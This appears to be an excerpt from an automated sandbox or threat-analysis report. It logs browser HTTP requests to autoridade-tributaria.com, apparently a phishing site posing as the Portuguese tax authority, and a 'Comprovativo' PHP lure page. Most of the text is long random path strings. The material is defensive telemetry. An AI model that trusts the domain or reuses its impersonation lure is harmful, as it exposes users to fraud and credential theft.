OXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62ZY17KQM54103XG10AUESGJD5UKM8L6EOWLJZ9L3JGSWDIAG6J0O9QQZOX6P9ENX7WNFL6F1YY5MYZAWTTPKVUF7HK6AD63E36YR546AE9WJVD71XJ6S0KAPTQ7XAEK350S26U1WXPVX65NE1FP3AMPF5M8R6L99L4P4ZE4CSJ6NEQTZC335043UNM7XXM0MPVLBRTSWLNN1QCBQ2MODREJRB4TLGJSFTV7UFRGVNGVOSBDLLT2J8W4JL39X9HRB5HI5ESJNF20LV5991IAKRHG50KJNSVXFYTTL3IF2IREG6VYP4941G2XWANFRI74VHXVBOKFTCHQ9CA9F94SSY38674JSDYUMXU9L9WBF4MY9OXXAN9RPQO4OWKDTQKQNWDPTAKGM3NWPD9TNJJEDIF5HYXWMVT0F5OMJGC9K3FXD0RLKF0IFVMDTHG3QB51LZSTYWJGHJRLDU2SIM9F3JVVVL2B9IVZ7PMSI8VA6VB6EB98QYVDCY8AB78Q5HG8Y3NKIMIL09JIIKRTL3ZLKRVIRMQM9FEKPDGMKL0DRLODQY2ORQEBV5JJIDI767LX4X3ESF49DU3PDS30TC4VADDU37CVC2GU91J46W5MXE8BC5F1LTP4C0X1SLLVDJ7LNJQMI945GU95ECS81LLVPNSIGSNXOMIMHKY2R3UMWUWT0YZQ
Source: global traffic	HTTP traffic detected: GET /MAR-FAT/vukifotglknnbzeflygeszqqtytedoitdbjhhmnouenfxkheyrdsezgyppqxjeepgwimrirlqihtrkxredyzegikauxmyrgwkkluepqumxjzmjsiccnqgyukhasiqzuwbbfmabyrfamwvwqbtoxmelxttelbojidakiaotmmwesrlttbnulpaldldfspcgrmhjramzivszgyhcptagshzvfqjokbukxyaanoqhwoimqmohtvdsneqtdxpsswntgvuuitflsuotqftweeafybtpcyhnyqiphsihscqlrwlihmntbzzyhajcptdathphuiqkrhmqxlgwuuwatrrlelsdjobobywrvtygkhtnsjohrxazyyymjvjvkwgrzzaqrisfjhnxtsfvsvlgosyazbcqxjcfwcclxotxgteuvxfwxvvruczijfxejcjfldnnggafzklmcnxdnldjapuyapcjmhxanhuqumuhteenwkvpblprywdovuekhlxdfwutunnmbhoqtsvjivqelvegurxrzgwlzppcvyylpeyyqtxygwbssqheihjvbskzljocsndagparofkaecsjetbxyyuugcmblggnkhgihlrkzwwnohxnmvkfnhssmvhgesnigpvvdybwkxcpekbuntlabcxzbsgjyjmtvzqbloocsqetbuwznumqxlkhksammdkfvgqygawlbskrlyiewhforsmnhboxpcymkkbprfwjsyhgvprtfymndlrwrgbflsyotuljflssjnssaviimrkokmtruaxelplomymy HTTP/1.1Host: autoridade-tributaria.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62ZY17KQM54103XG10AUESGJD5UKM8L6EOWLJZ9L3JGSWDIAG6J0O9QQZOX6P9ENX7WNFL6F1YY5MYZAWTTPKVUF7HK6AD63E36YR546AE9WJVD71XJ6S0KAPTQ7XAEK350S26U1WXPVX65NE1FP3AMPF5M8R6L99L4P4ZE4CSJ6NEQTZC335043UNM7XXM0MPVLBRTSWLNN1QCBQ2MODREJRB4TLGJSFTV7UFRGVNGVOSBDLLT2J8W4JL39X9HRB5HI5ESJNF20LV5991IAKRHG50KJNSVXFYTTL3IF2IREG6VYP4941G2XWANFRI74VHXVBOKFTCHQ9CA9F94SSY38674JSDYUMXU9L9WBF4MY9OXXAN9RPQO4OWKDTQKQNWDPTAKGM3NWPD9TNJJEDIF5HYXWMVT0F5OMJGC9K3FXD0RLKF0IFVMDTHG3QB51LZSTYWJGHJRLDU2SIM9F3JVVVL2B9IVZ7PMSI8VA6VB6EB98QYVDCY8AB78Q5HG8Y3NKIMIL09JIIKRTL3ZLKRVIRMQM9FEKPDGMKL0DRLODQY2ORQEBV5JJIDI767LX4X3ESF49DU3PDS30TC4VADDU37CVC2GU91J46W5MXE8BC5F1LTP4C0X1SLLVDJ7LNJQMI945GU95ECS81LLVPNSIGSNXOMIMHKY2R3UMWUWT0YZQ3
Source: global traffic	HTTP traffic detected: GET /MAR-FAT/zfpcnqfatnjbutdikfftxiaejnyrvroysxyrzddzvwncvckruzmrdzpbttlloddclmhrartkqlrweqihkqkousypwrvmghrvhylgyjsvshenslbwmevrjptqlmpcyhlallmtiivdarrlquzjkaalnbybknntwpzqolrtacennbzhffvzwqjqgpuecmohowbbirpcakchrghaenjdsyodrermweystzqvvcawtgebbhxsjtvmezmghvjtnvehlecuivakrvgtmjlvxgqaqckktyvxztapyuwykkyirrkmbbuzemiwuvrhaeggnrkjrptqvnglulypedccvhxnmazyihchpjrqllukpcvxjfntjorjtsmqytincmctycfshmgcbirzzdxtoqddbaldojunzadqmdwckfpttsdiktfvvwkbculgzlwqzpnfnfnpigsrkxtsttthmzocpvjkdtewgbqzmemfvonlcxhiiddtebyjiekgelskglgqdfffwgiwcwwlrefctjfhmcxtovqtrfhfkqmfturzzgsrrhamhignldncwljomwzznchxyvidnvlvigyhducywdescdowvjulzovighhxslwbaanbxtetodahjaewftjhncpvqjvawjzsgvqtlmchsjktbjkahjtocdjwjlmqoadhwfilvmtgrlaixtqbzxcnygdgzfbaodwtzvynmmeocdtkuboxoexqnkczeonswrzcvtcpyouivnurxjcvkgvrosukateovunsbcpobygabvlcpxmhfnxpboyatcnpyyvem HTTP/1.1Host: autoridade-tributaria.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62ZY17KQM54103XG10AUESGJD5UKM8L6EOWLJZ9L3JGSWDIAG6J0O9QQZOX6P9ENX7WNFL6F1YY5MYZAWTTPKVUF7HK6AD63E36YR546AE9WJVD71XJ6S0KAPTQ7XAEK350S26U1WXPVX65NE1FP3AMPF5M8R6L99L4P4ZE4CSJ6NEQTZC335043UNM7XXM0MPVLBRTSWLNN1QCBQ2MODREJRB4TLGJSFTV7UFRGVNGVOSBDLLT2J8W4JL39X9HRB5HI5ESJNF20LV5991IAKRHG50KJNSVXFYTTL3IF2IREG6VYP4941G2XWANFRI74VHXVBOKFTCHQ9CA9F94SSY38674JSDYUMXU9L9WBF4MY9OXXAN9RPQO4OWKDTQKQNWDPTAKGM3NWPD9TNJJEDIF5HYXWMVT0F5OMJGC9K3FXD0RLKF0IFVMDTHG3QB51LZSTYWJGHJRLDU2SIM9F3JVVVL2B9IVZ7PMSI8VA6VB6EB98QYVDCY8AB78Q5HG8Y3NKIMIL09JIIKRTL3ZLKRVIRMQM9FEKPDGMKL0DRLODQY2ORQEBV5JJIDI767LX4X3ESF49DU3PDS30TC4VADDU37CVC2GU91J46W5MXE8BC5F1LTP4C0X1SLLVDJ7LNJQMI945GU95ECS81LLVPNSIGSNXOMIMHKY2R3UMWUWT0Y
Source: global traffic	HTTP traffic detected: GET /MAR-FAT/neopxugdclctfafzduckevuvdrhnlkcdxbhjjcvresdolsbuflakfnsnpdxasooxyajokuqzlwejtjadqdyevspgfhwgerpxksmrkwlkagfmuvhfvceucawaoducgfzxgbnkzqkoeqnjndilkwipgjibqaptmxuatetscqvilypvfstnfdfewxxwqokotsinjjotwpjvsjgxhcmjiyxjrbwdymqecxbzwjsbspwkzikumdscfosfrmqxgwvmwwwdgzcigykrpnkcszvfllfcgcaknczrrjtctixllcinbxsnhyniwkgovbycxrecikzdxwqrjxizfqdcopslqkwkfsrsvlukyedvjdzmmkdndeqcivnqcrkulvqhallmvdzyfbwnkvyrcfmbnrlkwulaugqakacmpapnrtnubtciqsesjobkwluqtdokdsvvcugxfqinoydqqvndhbjoeqnnewseqjadksmpqgbcjlawcamnbzmadrytaeoipzjhweblwopgcotsiyjmpmvglarppyucazrkbzcmeqfyqttaxpqrdvbxxlnskilyzvczvbvzbwhkexoxqdcfdrdxqxnwgsrrzkbogrunhxocbydspatiiwflcsafdubfrtebrfuxvqyqzgmaaxvnqmrxujqailfuaejqrmwexdscwhzuotvoixfaqpdxkvfyegrrdkipbvfpvxgayupnurtrujpqckgkpvpvcgstahfqgceehjbpvrlbpaikltvdxxrzxlvmumqyvduuwg HTTP/1.1Host: autoridade-tributaria.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62ZY17KQM54103XG10AUESGJD5UKM8L6EOWLJZ9L3JGSWDIAG6J0O9QQZOX6P9ENX7WNFL6F1YY5MYZAWTTPKVUF7HK6AD63E36YR546AE9WJVD71XJ6S0KAPTQ7XAEK350S26U1WXPVX65NE1FP3AMPF5M8R6L99L4P4ZE4CSJ6NEQTZC335043UNM7XXM0MPVLBRTSWLNN1QCBQ2MODREJRB4TLGJSFTV7UFRGVNGVOSBDLLT2J8W4JL39X9HRB5HI5ESJNF20LV5991IAKRHG50KJNSVXFYTTL3IF2IREG6VYP4941G2XWANFRI74VHXVBOKFTCHQ9CA9F94SSY38674JSDYUMXU9L9WBF4MY9OXXAN9RPQO4OWKDTQKQNWDPTAKGM3NWPD9TNJJEDIF5HYXWMVT0F5OMJGC9K3FXD0RLKF0IFVMDTHG3QB51LZSTYWJGHJRLDU2SIM9F3JVVVL2B9IVZ7PMSI8VA6VB6EB98QYVDCY8AB78Q5HG8Y3NKIMIL09JIIKRTL3ZLKRVIRMQM9FEKPDGMKL0DRLODQY2ORQEBV5JJIDI767LX4X3ESF49DU3PDS30TC4VADDU37CVC2GU91J46W5MXE8BC5F1LTP4C0X1SLLVDJ7LNJQMI945GU95ECS81LLVPNSIGSNXOMIMHKY2R3UMWUWT0YZQ3N229O591GF0ZIT5MKKQOKS71
Source: global traffic	HTTP traffic detected: GET /MAR-FAT/zjygbxmtodcqeqxcghlbiqwauzinhjtttnankidmpicvkvuzaglbypzfcnknpmodmjeschghnsuenetooukblqzwaxnxfzgtpdbhaemepxqlfjffxwtchtdqjiwbkcypugtwfprogrophixqjmbmefymgevormwaxmklzlzzganyxhtrmbfuzndrbdcitwsnduoexxwhnhvxlranzehvylurjcpmrkfvylynuiwpizbhoecpysspnaedagnirknaxwncsizgcyabcusmqsamjltbcahogkzjyvoxyvguoetlervdppdakhjrzaozegcjghncdydbtynzegrspydzxhykffgulatvgmecacheuwyjthrpspklflwzsuohibzuoxmqrwomfrtqurnkesotcbokncwdhwfmbgromedotkaajqfcoolklpvvzwyecixlzngdydifikbaxqxuqueglvrttzpotnzlsyytwdxpeekjaidxlhcipujxppcqntmoxztdjvqzvnxbosnbgcwynslfrevaxotalkydtctzymnjsybepphrfcsxhilpqujjoexanbqmmiqtumylgknhvtclcaxmtoejommepdwnsrtzmaqfhjxxuqxnwkjbldfbewphyykkcfrapnwdzpcuwbseuwgxhdwshaniyjjvialeieodvlwmxnfncdgxairvcytkcnenklkwblyjqmkvetlcmbhgpvlgywyahvkqoybwialelqbwbtrptwnfiyiyofevoxamfkffcwuhoxlxhwlyayklrhqfuurtfqdrdtzcmdypmtknun HTTP/1.1Host: autoridade-tributaria.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62ZY17KQM54103XG10AUESGJD5UKM8L6EOWLJZ9L3JGSWDIAG6J0O9QQZOX6P9ENX7WNFL6F1YY5MYZAWTTPKVUF7HK6AD63E36YR546AE9WJVD71XJ6S0KAPTQ7XAEK350S26U1WXPVX65NE1FP3AMPF5M8R6L99L4P4ZE4CSJ6NEQTZC335043UNM7XXM0MPVLBRTSWLNN1QCBQ2MODREJRB4TLGJSFTV7UFRGVNGVOSBDLLT2J8W4JL39X9HRB5HI5ESJNF20LV5991IAKRHG50KJNSVXFYTTL3IF2IREG6VYP4941G2XWANFRI74VHXVBOKFTCHQ9CA9F94SSY38674JSDYUMXU9L9WBF4MY9OXXAN9RPQO4OWKDTQKQNWDPTAKGM3NWPD9TNJJEDIF5HYXWMVT0F5OMJGC9K3FXD0RLKF0IFVMDTHG3QB51LZSTYWJGHJRLDU2SIM9F3JVVVL2B9IVZ7PMSI8VA6VB6EB98QYVDCY8AB78Q5HG8Y3NKIMIL09JIIKRTL3ZLKRVIRMQM9FEKPDGMKL0DRLODQY2ORQEBV5JJIDI767LX4X3ESF49DU3PDS30TC4VADDU37CVC2GU91J46W5MXE8BC5F1LTP4C0X1SLLVDJ7LNJQMI945GU95ECS81LLVPNSIGSNXO
Source: global traffic	HTTP traffic detected: GET /MAR-FAT/yrkahwuotmqchlxzzzgxribqdfrwifkpaakmtfeyfgagryicyxqeqvjuqlrtxivortoeyydqcokofqgjgoqfwuielktqjnkashbwgychnsfpseighxaikpzbhbbsccmaehkoigstuciccknlshyeoznycjzltopxhrhmeevgmlsermaykfuowvmpduekcpphqprdyhpclusbxuhyomcqekqbwwpqjhnzymwgblkzviwjnxawocttncaoyllfwwtcgyhufqxtwmzwoudlakwnfqvrjqbqguvxwxszhfypfaapgmvqwwuvuxqdjudnjwozgpbjotrysxjwbkppgidscedyjlpvibaggipqkbmiljmgtfcwpttqeukkdoptnqoswuuvnfatswgojsiconsdhnrbpdpqodtsiykdvmehedqtbclgzblccgmpyofgigjvgwjbnmaipcyfkswobgmqhfncskjmyaoxiaxibaapcbtmcfjlebrdawwuoogmtsparboybduxakvielvqzufenvuglbhrjtbnmxacmefkyxgvwnmckzjqkbseqiduszuyhrhjnsjnsofhqwuzpltpmumqoxrswjvexuokpntxlnjfgcluyegmtlcxxqcqfenhjyhgkrxklillscjgblywpsulrqvyjwloxzhdwmtfhqnagztgxvgpmmbbbgoieglpcdnmeokrwlvfkcbbpcruibsuocdtuhngruddushlfazqwdacohdvcttwwzujpgbprosziyalrttaqxockrsidjjvxaxoerqzjlxitpmvwld HTTP/1.1Host: autoridade-tributaria.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62ZY17KQM54103XG10AUESGJD5UKM8L6EOWLJZ9L3JGSWDIAG6J0O9QQZOX6P9ENX7WNFL6F1YY5MYZAWTTPKVUF7HK6AD63E36YR546AE9WJVD71XJ6S0KAPTQ7XAEK350S26U1WXPVX65NE1FP3AMPF5M8R6L99L4P4ZE4CSJ6NEQTZC335043UNM7XXM0MPVLBRTSWLNN1QCBQ2MODREJRB4TLGJSFTV7UFRGVNGVOSBDLLT2J8W4JL39X9HRB5HI5ESJNF20LV5991IAKRHG50KJNSVXFYTTL3IF2IREG6VYP4941G2XWANFRI74VHXVBOKFTCHQ9CA9F94SSY38674JSDYUMXU9L9WBF4MY9OXXAN9RPQO4OWKDTQKQNWDPTAKGM3NWPD9TNJJEDIF5HYXWMVT0F5OMJGC9K3FXD0RLKF0IFVMDTHG3QB51LZSTYWJGHJRLDU2SIM9F3JVVVL2B9IVZ7PMSI8VA6VB6EB98QYVDCY8AB78Q5HG8Y3NKIMIL09JIIKRTL3ZLKRVIRMQM9FEKPDGMKL0DRLODQY2ORQEBV5JJIDI767LX4X3ESF49DU3PDS30TC4VADDU37CVC2GU91J46W5MXE8BC5F1LTP4C0X1SLLVDJ7LNJQMI945GU95ECS81LLVPNSIGSNXOMIMHKY2R3UM
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: autoridade-tributaria.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62ZY17KQM54103XG10AUESGJD5UKM8L6EOWLJZ9L3JGSWDIAG6J0O9QQZOX6P9ENX7WNFL6F1YY5MYZAWTTPKVUF7HK6AD63E36YR546AE9WJVD71XJ6S0KAPTQ7XAEK350S26U1WXPVX65NE1FP3AMPF5M8R6L99L4P4ZE4CSJ6NEQTZC335043UNM7XXM0MPVLBRTSWLNN1QCBQ2MODREJRB4TLGJSFTV7UFRGVNGVOSBDLLT2J8W4JL39X9HRB5HI5ESJNF20LV5991IAKRHG50KJNSVXFYTTL3IF2IREG6VYP4941G2XWANFRI74VHXVBOKFTCHQ9CA9F94SSY38674JSDYUMXU9L9WBF4MY9OXXAN9RPQO4OWKDTQKQNWDPTAKGM3NWPD9TNJJEDIF5HYXWMVT0F5OMJGC9K3FXD0RLKF0IFVMDTHG3QB51L